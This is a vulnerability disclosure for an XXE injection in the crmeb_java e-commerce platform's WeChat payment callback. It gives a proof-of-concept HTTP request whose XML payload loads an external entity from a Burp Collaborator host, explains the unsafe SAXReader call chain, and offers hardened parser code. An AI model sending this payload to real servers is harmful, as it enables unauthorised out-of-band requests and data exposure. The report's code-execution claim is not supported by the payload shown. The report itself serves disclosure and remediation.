Description
[Suggested description]
There is an XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered through the SAXReader component.
[Vulnerability Type]
XML External Entity (XXE) Injection
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
/api/admin/payment/callback/wechat
[Attack Type]
Remote
[Vulnerability details]
Send the crafted request to the API endpoint /api/admin/payment/callback/wechat:
```
POST /api/admin/payment/callback/wechat HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 239

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]>
<return_code>&xxe;</return_code>
<return_msg><![CDATA[OK]]></return_msg>
```
[Impact Code execution]
true
[Cause of vulnerability]
The endpoint /api/admin/payment/callback/wechat calls the function weChat.

If the xmlInfo is not blank, the function processResponseXml will be called.

That function then calls xmlToMap to parse the XML.

xmlToMap parses the body with a default-configured SAXReader, which resolves external entities, so the DOCTYPE in the callback body leads to XXE Injection.
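As an added example (not crmeb_java's own code), the following shows an xmlToMap-style helper built on dom4j's SAXReader, the component the report identifies, in both the default configuration the report describes and a hardened configuration that refuses DOCTYPE declarations before any entity is resolved. The class and method names, the sample callback bodies and the set of parser features are assumptions of this example, not code taken from the project.

```java
import java.io.StringReader;
import java.util.LinkedHashMap;
import java.util.Map;

import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

// Added example (not crmeb_java code): hardening a dom4j SAXReader so that a
// DOCTYPE-bearing payment callback body is rejected instead of parsed.
public class HardenedXmlToMap {

    // The pattern the report describes: a SAXReader with default settings
    // resolves external entities declared in a DOCTYPE, so the server fetches
    // whatever resource the entity points at.
    static SAXReader defaultReader() {
        return new SAXReader();
    }

    // Hardened reader: disallow DOCTYPE outright (the primary fix), and also
    // switch off external entity and external DTD loading as a second layer
    // in case the underlying parser implementation ignores the first feature.
    static SAXReader hardenedReader() throws SAXException {
        SAXReader reader = new SAXReader();
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return reader;
    }

    // Flattens the children of the root element into a map, which is what a
    // WeChat Pay callback handler typically needs (return_code, return_msg, ...).
    static Map<String, String> xmlToMap(SAXReader reader, String xml) throws DocumentException {
        Document doc = reader.read(new StringReader(xml));
        Element root = doc.getRootElement();
        Map<String, String> result = new LinkedHashMap<>();
        // Cast per element so this compiles against both dom4j 1.x (raw List)
        // and dom4j 2.x (List<Element>).
        for (Object o : root.elements()) {
            Element child = (Element) o;
            result.put(child.getName(), child.getTextTrim());
        }
        return result;
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign callback body in the WeChat Pay notification format.
        String benign = "<xml><return_code><![CDATA[SUCCESS]]></return_code>"
                      + "<return_msg><![CDATA[OK]]></return_msg></xml>";

        // Constructed body carrying a DOCTYPE with an internal entity only.
        // A hardened parser must reject it before it ever looks at the entity.
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY e \"x\">]>"
                           + "<xml><return_code>&e;</return_code></xml>";

        System.out.println("benign, hardened reader -> " + xmlToMap(hardenedReader(), benign));

        // The default reader happily expands the entity: return_code becomes "x".
        System.out.println("doctype, default reader  -> " + xmlToMap(defaultReader(), withDoctype));

        try {
            xmlToMap(hardenedReader(), withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE was accepted by the hardened reader");
        } catch (DocumentException e) {
            // Xerces reports that DOCTYPE is disallowed when the feature is set to true.
            System.out.println("doctype, hardened reader -> rejected: " + e.getMessage());
        }
    }
}
```

The disallow-doctype-decl feature is the one that actually closes the hole: with it set, the parser raises an error at the `<!DOCTYPE` token, so no entity declaration is ever processed and no network or file access can be triggered by the callback body. The remaining features are defence in depth for parsers that do not honour it. Because the endpoint is an unauthenticated payment callback, the parser configuration is the only control between the request body and entity resolution, which is why the fix belongs in the reader setup rather than in input filtering.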

That's all, thanks.
